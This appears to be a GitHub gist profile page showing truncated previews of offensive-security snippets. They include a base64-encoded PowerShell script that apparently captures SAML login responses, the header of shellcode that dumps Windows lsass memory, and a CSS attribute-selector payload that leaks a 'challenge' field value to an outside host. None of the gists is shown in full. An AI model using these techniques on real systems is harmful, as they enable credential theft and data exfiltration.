Skip to content

Instantly share code, notes, and snippets.

View uBadRequest's full-sized avatar
:octocat:

Bad Requests uBadRequest

:octocat:
View GitHub Profile

Keybase proof

I hereby claim:

  • I am ubadrequest on github.
  • I am badrequests (https://keybase.io/badrequests) on keybase.
  • I have a public key ASAfm6OxBj3WuwE2bRHoqUshmYiPzCop1VanT4aWI11IUwo

To claim this, I am signing this object:

/*
________ ________ ________ ___ __ ________ ___ ___ ___ ________
|\ ___ \|\ __ \|\ __ \|\ \|\ \ |\ __ \|\ \ |\ \|\ \|\ ____\
\ \ \_|\ \ \ \|\ \ \ \|\ \ \ \/ /|\ \ \|\ \ \ \ \ \ \\\ \ \ \___|_
\ \ \ \\ \ \ __ \ \ _ _\ \ ___ \ \ ____\ \ \ \ \ \\\ \ \_____ \
\ \ \_\\ \ \ \ \ \ \ \\ \\ \ \\ \ \ \ \___|\ \ \____\ \ \\\ \|____|\ \
\ \_______\ \__\ \__\ \__\\ _\\ \__\\ \__\ \__\ \ \_______\ \_______\____\_\ \
\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|__| \|_______|\|_______|\_________\
\|_________|
________ ___ ___ ________ _______ ___ ___ _______ __
$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("ZnVuY3Rpb24gTmV3LVNBTUxJbnRlcmFjdGl2ZSB7DQoNCiAgICBbQ21kbGV0QmluZGluZygpXQ0KICAgIHBhcmFtKA0KICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICR0cnVlKV0NCiAgICAgICAgW3N0cmluZ10gJExvZ2luSURQDQogICAgKQ0KDQogICAgQmVnaW4gew0KDQogICAgICAgICRSZWdFeCA9ICcoP2kpbmFtZT0iU0FNTFJlc3BvbnNlIig/OiB0eXBlPSJoaWRkZW4iKT8gdmFsdWU9XCIoLio/KVwiKD86LiopP1wvPicNCg0KICAgICAgICBBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5XaW5kb3dzLkZvcm1zDQogICAgICAgIEFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLldlYg0KDQogICAgfQ0KDQogICAgUHJvY2VzcyB7DQoNCiAgICAgICAgIyBjcmVhdGUgd2luZG93IGZvciBlbWJlZGRlZCBicm93c2VyDQogICAgICAgICRmb3JtID0gTmV3LU9iamVjdCBXaW5kb3dzLkZvcm1zLkZvcm0NCiAgICAgICAgJGZvcm0uU3RhcnRQb3NpdGlvbiA9IFtTeXN0ZW0uV2luZG93cy5Gb3Jtcy5Gb3JtU3RhcnRQb3NpdGlvbl06OkNlbnRlclNjcmVlbjsNCiAgICAgICAgJGZvcm0uV2lkdGggPSA2NDANCiAgICAgICAgJGZvcm0uSGVpZ2h0ID0gNzAwDQogICAgICAgICRmb3JtLnNob3dJY29uID0gJGZhbHNlDQoNCiAgICAgICAgJHdlYiA9IE5ldy1PYmplY3QgV2luZG93cy5Gb3Jtcy5XZWJCcm93c2VyDQogICAgICA
#include <stdio.h>
#include <string.h>
#include <windows.h>
/*
* Title: Shellcode to dump the lsass process
* Works only on Windows 10 and Windows Server 2019
* Arch: x86_64
* Author: Osanda Malith Jayathissa (@OsandaMalith)
* Website: https://osandamalith.com
#username[name="*challenge*"] {
background:url("http://challenge_answer.abadrequest.com");
}
<script>
function toSubmit(){
alert('I will not submit');
return false;
}
</script>
<form onsubmit="return toSubmit();" >